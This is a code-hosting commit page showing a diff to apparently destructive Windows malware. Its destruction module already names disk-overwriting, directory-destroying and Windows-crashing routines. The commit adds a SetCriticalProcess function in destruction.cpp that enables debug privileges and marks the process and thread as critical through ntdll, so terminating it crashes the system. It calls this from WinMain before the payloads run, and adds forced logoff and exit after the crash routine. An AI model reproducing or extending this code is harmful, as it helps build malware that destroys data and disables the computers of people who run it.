Add critical process

LeoLezury · Feb 5, 2022 · ee079d7 · ee079d7
1 parent c9fb0f0
commit ee079d7
Show file tree

Hide file tree

Showing 3 changed files with 22 additions and 0 deletions.
diff --git a/src/destruction.cpp b/src/destruction.cpp
@@ -211,6 +211,21 @@ void OverWriteDisk() {
     }
 }
 
+void SetCriticalProcess() {
+    HANDLE hToken = NULL;
+    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
+
+    HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
+    VOID(WINAPI * RtlSetProcessIsCritical)(BOOLEAN, PBOOLEAN, BOOLEAN) = (VOID(WINAPI * )(BOOLEAN, PBOOLEAN, BOOLEAN))GetProcAddress(hNtdll, "RtlSetProcessIsCritical");
+    VOID(WINAPI * RtlSetThreadIsCritical)(BOOLEAN, PBOOLEAN, BOOLEAN) = (VOID(WINAPI*)(BOOLEAN, PBOOLEAN, BOOLEAN))GetProcAddress(hNtdll, "RtlSetThreadIsCritical");
+
+    SetPrivilege(hToken, SE_DEBUG_NAME, true);
+    if (RtlSetProcessIsCritical && RtlSetThreadIsCritical) {
+        RtlSetProcessIsCritical(true, NULL, false);
+        RtlSetThreadIsCritical(true, NULL, false);
+    }
+}
+
 void CrashWindows() {
     HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
     VOID(*RtlAdjustPrivilege)(DWORD, DWORD, BOOLEAN, LPBYTE) = (VOID(*)(DWORD, DWORD, BOOLEAN, LPBYTE))GetProcAddress(hNtdll, "RtlAdjustPrivilege");
@@ -225,4 +240,8 @@ void CrashWindows() {
     }
 
     FreeLibrary(hNtdll);
+
+    ExitWindows();
+
+    ExitProcess(0);
 }
diff --git a/src/destruction.h b/src/destruction.h
@@ -5,4 +5,5 @@
 
 extern void DestroyDirectory(LPWSTR Directory);
 extern void OverWriteDisk();
+extern void SetCriticalProcess();
 extern void CrashWindows();
diff --git a/src/main.cpp b/src/main.cpp
@@ -52,6 +52,8 @@ int WinMain(
 	CreateThread(NULL, 0, LPTHREAD_START_ROUTINE(InitTimer), (PVOID)1000, 0, NULL);
 	CreateThread(NULL, 0, LPTHREAD_START_ROUTINE(AudioPayloadThread), (PVOID)pAudioSequences, 0, NULL);
 
+	SetCriticalProcess();
+
 	ExecutePayload(Payload1, PAYLOAD_TIME);
 	ExecutePayload(Payload2, PAYLOAD_TIME);
 	ExecutePayload(Payload3, PAYLOAD_TIME);